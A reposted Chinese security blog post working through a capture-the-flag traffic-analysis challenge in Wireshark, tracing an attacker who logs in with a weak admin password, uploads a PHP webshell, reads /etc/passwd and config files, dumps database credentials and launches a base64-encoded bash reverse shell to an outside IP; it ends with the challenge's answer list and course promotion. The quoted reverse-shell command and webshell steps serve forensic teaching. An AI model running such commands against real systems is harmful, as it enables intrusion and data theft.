揭秘 | 实操溯源分析黑客攻击网站流量!
2023-6-27 08:5:10 Author: 网络安全自修室(查看原文) 阅读量:36 收藏

点击上方蓝字关注我们

1
免责声明
      本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,遵守国家相关法律法规,请勿用于违法用途如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
2
内容速览

起因是发现一道基础而又系统的流量包分析题,竟然由易到难,有15道题,一时来了兴致,先刷为敬,全文边实操边编写,分析的不一定对,仅供参考

实操解题

使用wireshark打开流量包发现这是一个渗透过程的流量数据,阅读题目后发现,可以从上传木马作为突破口 因为一句话大多都带有POST[]等字样直接过滤,发现了上传的数据包,http追踪后发现一句话木马的密码(h4ck4fun),和上传的文件名(/static/upload/other/20220706/1657037870691680.phtml)因而围绕这个小马地址来探索黑客执行了什么命令

http matches "/static/upload/other/20220706/1657037870691680.phtml" && http.request.method == "POST"

发现黑客连接小马后 执行的第一个命令是phpinfo(),追踪该数据包发现该网站框架为Zend v3.0.0,操作系统为ubuntu0.16.04.1,PHP Version 7.0.33-0 继续查看黑客执行的命令的数据包,发现其打开了几个敏感的文件 打开了/etc/passwd

打开了/var/www/html/config/config.php

打开了/var/www/html/admin.php ,发现了管理员的名称和邮箱

打开了/var/www/html/config/database.php文件,存在数据库的账号密码等配置信息

还进行了敏感的操作,如 查看用户权限命令whoami,回显为www-data用户权限

打包网站源代码打包密码为5034737377307264还进行了反弹shell对该命令进行base64解密

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTIzLjIyMi4zMzMvNDQ0NCAwPiYx|base64 -d

拿到真实的命令为,可见黑客准备将shell反弹到111.123.222.333机器4444端口上

bash -i >& /dev/tcp/111.123.222.333/4444 0>&1

黑客反弹了tcp协议的shell,同时也拿到了mysql数据库的密码,因而会去查询数据库数据 所以需要使用如下语法获取该数据包

tcp contains "mysql"

image.png

直接追踪tcp数据流,发现使用mysql查询语句

发现存在如下数据库

information_schema.....mysql ....pbootcms.....performance_schema.....sys... ... 当前数据库为pbootcms

黑客除了翻看库名、表名外,还查询了账号密码获得其中xiaoming的账号的密码为MXFhejJ3c3g=,解密为1qaz2wsx由此可知,黑客直接上传了小马,然后获取到数据库配置信息,连接了数据库,还打包了网站源代码,并将shell反弹了

但是有个问题还没搞清楚,上传是需要后台登录的,但是黑客是如何登录的,以及后台地址在哪,这个后台是哪家公司的都尚未可知.

转换思路,后台登录肯定是POST,且链接中含login或admin字样

http.request.method == "POST"

筛选数据包,发现存在4个admin.php登录数据包,其中最后一个登录的登录密码为admin123,直接登录成功跳转到后台/index/home主页中去了,登录 返回包时间为Date: Tue, 05 Jul 2022 16:17:11

黑客明显是通过后台弱口令进入的,连爆破工具都没用!运气忒好了!

这到底是哪家公司设置的弱口令? 直接上过滤语法

http.request.method == GET

找到访问首页的数据包7980 ,直接找到公司相关的信息

值得说道的是,如果从Logo图标出发,却有着不一样的答案

这里也把思路大致说一下,如果从logo上着手,会发现是另外一家公司通过百度的以图搜图综合筛选条件锁定为海南鑫建恒丰科技工程有限公司

答题

从实操溯源的信息,进而可以答以下的问题:

攻击者的IP? 10.211.55.4

受害者的IP? 192.168.0.177

受害者网站的框架 Zend V3.0

网站管理员的邮箱[email protected](在admin.php中发现) /[email protected](后台登录账号)

网站后台的弱口令 admin123

初次登录后台的时间 请求访问时间为: 2022-07-06 00:17:10 服务器返回时间为: 2022-07-05 16:17:11

受害者公司地址,精确到市 南昌市(首页直接显示)  / 海口市(通过Logo查找)

黑客上传的木马的名字 1657037870691680.phtml

黑客木马的连接密码h4ck4fun

黑客获取到的账号权限 www-data

数据库的连接密码p4ssw0rd

服务器有多少个数据库 5个

数据表中ay_user中用户名xiaoming的密码1qaz2wsx

黑客把网站打包了,打包的密码是什么5034737377307264

黑客进行反弹shell的目标IP是多少111.123.222.333

如果想要系统学习网络安全技术

不妨加入知识星球课程

《60天入门网络安全渗透测试》

从入门到案例,贴合实战

轻松易懂、好玩实用

限时领取

知识星球

超值 | 一起学网络安全! 授人以鱼不如授人以渔!

活动优惠券

跟着60天入门学习路线一起学

期待你的到来!

往期推荐

从入门到入狱的技术,可以学,别乱用!

网络安全学习方向和资源整理(建议收藏)

一个web安全工程师的基础学习规划

资源 | 渗透测试工程师入门教程(限时领取)

5年老鸟推荐10个玩Python必备的网站

推荐十个成为网络安全渗透测试大佬的学习必备网站!

那些社工师不为人知的秘密。。。

更多内容请关注公众号

网络安全自修室

回复:”网络安全入门教程
领取系统网络安全学习教程!

点个在看你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0NDYxMzk1Mg==&mid=2247499065&idx=1&sn=a85dd9c463a1043ddfd21c02431393e2&chksm=e959ab16de2e22008a7398051ad70cd10bce8ecc5330cfbe2f199aa4d2c09456e0fb75987710#rd
如有侵权请联系:admin#unsafe.sh